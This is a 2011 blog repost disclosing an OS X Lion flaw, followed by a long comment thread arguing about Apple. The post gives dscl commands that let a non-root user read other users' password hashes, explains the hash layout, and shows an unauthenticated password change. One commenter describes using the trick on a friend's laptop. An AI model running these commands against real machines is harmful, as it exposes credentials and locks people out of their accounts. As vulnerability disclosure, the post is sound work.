Sunday, September 18, 2011

Apple Makes Cracking OS X Lion Passwords Easier Than EverB

from DefenseIndepth
You are now root!
In 2009 I posted an article on Cracking Mac OS X passwords. Whilst this post has been quite popular, it was written for OS X 10.6 and prior. Since the release of Mac OS X Lion (10.7) in July, I have received numerous requests for an update. Typically, I would have just updated the existing article without the need for a new post. However, during my research I discovered something interesting about OS X Lion that I'd like to share.

In previous versions of OS X (10.6, 10.5, 10.4) the process to extract user password hashes has been the same: obtain the user's GeneratedUID and then use that ID to extract hashes from a specific user's shadow file (See my previous post for a more detailed description).

When it comes to Lion, the general premise is the same (albeit a few technical differences). Each user has their own shadow file, with each shadow file stored under a .plist file located in /var/db/dslocal/nodes/Default/users/.

The interesting thing when it comes to Lion's implementation, however, is privilege. As mentioned above, all OS X versions are using shadow files. For the unfamiliar, a shadow file is that which can only be accessed by users with a high privilege (typically root). So for all modern OS X platforms (Tiger, Leopord, Snow Leapord and Lion) each user has their own shadow file (hash database) whose data is accessible only by the root user… or at least it should be.

It appears in the redesign of OS X Lion's authentication scheme a critical step has been overlooked. Whilst non-root users are unable to access the shadow files directly, Lion actually provides non-root users the ability to still view password hash data. This is accomplished by extracting the data straight from Directory Services.

If we invoke a a directory services listing on user bob by specifying the /Local/ path we can see bobs standard profile information:

$ dscl localhost -read /Local/Default/Users/bob

This provides us with nothing too exciting. However, if we invoke the directory services listing using the /Search/ path, we see a different result:

$ dscl localhost -read /Search/Users/bob

From the output, we can see the following data:

dsAttrTypeNative:ShadowHashData:

62706c69 73743030 d101025d 53414c54 45442d53 48413531 324f104474911f72 3bd2f66a 3255e0af 4b85c639 776d510b 63f0b939 c432ab6e 082286c4 7586f19b 4e2f3aab 74229ae1 24ccb11e 916a7a1c 9b29c64b d6b0fd6c bd22e7b1 f0ba1673 080b1900 00000000 00010100 00000000 00000300 00000000 00000000 00000000 000060

Note: The SHA512 hash is stored from bytes 32-96 (green) and the salt is stored from bytes 28-31(red). For more information on these hashes please see this thread.

This ShadowHashData attribute actually contains the same hash stored in user bob's shadow .plist file. The interesting thing about this? root privileges are not required. All users on the system, regardless of privilege, have the ability to access the ShadowHashData attribute from any other user's profile.

Due to Lions relatively short time on the market, I am yet to find any of the major crackers supporting OS X Lion hashes (SHA512 + 4-byte salt). To simplify the cracking of these hashes I have created a simple python script which can be downloaded here.

Now, if the password is not found by the dictionary file you're out of luck, right? Well, no! Why crack hashes when you can just change the password directly! It appears Directory Services in Lion no longer requires authentication when requesting a password change for the current user. So, in order to change the password of the currently logged in user, simply use:

$ dscl localhost -passwd /Search/Users/bob

And viola! You will be prompted to enter a new password without the need to authenticate.


--------------------
Thanks Apple.

14 comments:

  1. Ha ha, Apple sucks again!

    ReplyDelete
  2. It must drive you haters crazy that, despite all the examples of Apple's failings posted on this blog, Apple's popularity continues to snowball...

    Apple Blasts To All-Time High, Now Worth Almost As Much As Microsoft And Google Combined
    http://www.businessinsider.com/apple-continues-rise-2011-9

    The American Customer Satisfaction Index: Apple Aces It, Again
    http://technologizer.com/2011/09/20/apple-satisfaction/

    No company's products are without flaws. It's pretty clear to me that your priorities are quite different that of the masses who account for Apple's phenomenal growth.

    This password thing will likely cause no real problems before it is fixed in the next minor system update.

    ReplyDelete
  3. "This password thing will likely cause no real problems before it is fixed in the next minor system update."

    Are you kidding? That's a HUGE security flaw!

    With the right technical know-how, and a little tweaking of our friend's python script, thousands (if not MILLIONS) of Mac users could have their credentials reset, resulting in mass chaos when many users are locked "out of the garden."

    And since root access is no longer required, that makes it even easier. This is an issue needs to jump on ASAP, as it only takes seconds for the system to be compromised.

    ReplyDelete
  4. I'm not suggesting that Apple shouldn't (or won't) promptly address the issue. Only stating my opinion that this flaw will not actually affect many (or perhaps any) Mac users.

    We'll see who is right about this... me or the haters. If the sky falls tomorrow you can have the satisfaction of saying you told me so.

    ReplyDelete
  5. I doubt that. Even if the sky falls you'll probably just say the haters are blowing things out of proportion. For reference, take a look at some of the other posts already up on this site.

    ReplyDelete
  6. Lol, yeah, Brett U Jelly? U Mad? I'm the first to say when Windows needs a patch badly or Linux needs to make an improvement, but you're fun to watch. You get soooooo defensive over a multi billion dollar company that doesn't need your help.

    ReplyDelete
  7. Haters DO tend to blow things up out of proportion. Dave says to look at the other postings on this blog. Go ahead. So many of the the flaws and criticisms mentioned on this blog HAVE been insignificant. The doomsayers are proven wrong time and again. None of the "-gate" manufactured scandals or the competition's so-called "-killer" products seem have the anticipated effect. Apple shows no sign of succumbing.

    Unlike Microsoft which has an army of IT managers forcing whole companies of workers adopt Windows PCs, Apple has had to win people's hearts one at a time. This despite the constant background of FUD thrown up by haters.

    I sincerely believe that the haters are wrong in this case as well, and that this theoretical exploit, like so many others, never gets out of the lab. I also believe that, regardless, Apple will act quickly to close this vulnerability. (I never said that Apple shouldn't fix it)

    I'm only as defensive than this blog is offensive.

    ReplyDelete
  8. I did look back at some of the other posts. I can clearly see that you're doing what you always do. You say that the documented an proven problems are small and insignificant. The problems are real, the scandals are not manufactured and the articles are not FUD. I don't think this blog is "offensive", it is just pointing out the problems with Apple. Also, you must be joking about the army of IT managers FORCING companies to buy Windows machines. If you believe that you are truly sick in the head.

    ReplyDelete
  9. We obviously disagree on what constitutes a significant problem. I feel that problems that affect relatively few people and/or that are remedied quickly don't justify the alarm that haters seem to exhibit.

    The fact that Apple continues to achieve phenomenal financial success and user satisfaction seems to support my contention that Apple is not having the kind of problems that hurt sales, affect the bottom line adversely, or cause widespread dissatisfaction.

    We also disagree about the role IT managers have had in keeping Apple equipment out of companies. While the situation may have loosened up more recently, I will only say that, in the past, I have personally worked at more than one company with a "No Macs" policy (and I'll bet others have too). Apple appears to have had greater success selling directly to end-users, where corporate gatekeepers do not have veto power.

    Finally, the very name of this blog, Applehaters, is offensive. I also find many of Dave's snarky comments on the articles he cites to be offensive.

    ReplyDelete
  10. Awwww, Dave made Brett cry! Offensive? No. Acccurate? Yes. Funny? Absolutely.

    I think everyone finds a giant security hole like that a major problem.

    ReplyDelete
  11. I just upgraded my Mac to Lion and I didn't know anything about this. I agree that it is a major hole in the Mac OS. I sincerely hope Apple comes up with a patch for this soon before the hackers start to exploit it in a big way.

    ReplyDelete
  12. Regarding my hater namesake's assertion that IT Managers haven't been forcing Windows computers on its employees...

    A recent New York Times article discusses what happens when corporate IT policies are loosened up allowing employees to choose their own equipment.

    "Throughout the information age, the corporate I.T. department has stood at the chokepoint of office technology with a firm hand on what equipment and software employees use in the workplace. They are now in retreat. Employees are bringing in the technology they use at home and demanding the I.T. department accommodate them. The I.T. department often complies."

    "...Of the 1,000 or so employees in Citrix’s program, 46 percent have bought Mac computers, according to Paul Martine, Citrix’s chief information officer. 'That was a little bit of a surprise.' ”

    http://tinyurl.com/6dmwsnb

    And regarding the original topic of the password changing exploit, one week later we are still waiting for the sky to fall.

    ReplyDelete
  13. So that's why Macs are not prevalent in the corporate world! All this time, I thought it was Apple's lack of enterprise support over the years that keeps it out of many offices.Turns out its evil IT Managers and the Iron Fist of Microsoft that keeps it out.

    While I definitely think that end users should have a say about being comfortable with the devices they use, it's our job to make sure said devices work with our environment in a secure way. If an Apple devices fits, that's fine. If not, don't start griping how the "IT man is keeping you down." Until Apple plays ball with the IT world and opens its closed system so businesses can suit it to their needs afford-ably, then it's going to be a rocky road for them.

    As far as the password topic, no one said it was going to be the end of Apple, just that the exploit exists, and that it is there to be taken advantage of. Since people pay good money for the supposed awesome security that Apple says they provide, then this exploit should have been closed immediately. I used this exploit over the weekend on my friends MacBook, just to show him that the issue exist. Believe me, he thought it was important when he couldn't logon.

    Now if you excuse me, I have to go cut a deal with Microsoft. They have out IT Manager captive, and said they're going to start sending fingers if we don't integrate Office 365 into our corporate structure. lol

    ReplyDelete
  14. IT managers aren't the captives. It's the other 99% of the company's employees, the end users, that are forced to use Windows.

    I'm not denying that Microsoft caters to businesses better than Apple, because they certainly do. The things that Microsoft does to make its products attractive to businesses (IT management), are in many cases the same things that make it harder and less pleasant for individuals to manage their own computers. Of course that's what IT people want... systems that require expertise and encourage large IT departments.

    Nevertheless, there are tools available (often from third parties) and ways to support interoperability of Macs in corporate environments. But letting Macs in might require IT to do some research (learn something new), and heaven forbid, require support of multiple platforms. A few decades ago, the saying was "No one ever got fired for specifying IBM". Now IBM has been replaced by Microsoft, as the "safe" standard. IT departments have long been making their own jobs easier and more secure at the expense of end-users, and will naturally attempt to continue to do so.

    As Macs continue to gain market share in the general population, the pressure to accept them into business will only increase, but so will the availability of interpretability and management tools. Leaving aside the arguably superior user experience of Macs, businesses should want to run on a mix of systems (rather than a Microsoft monoculture), if for no other reason than to reduce the chance of a zero day exploit taking down the entire company.

    ReplyDelete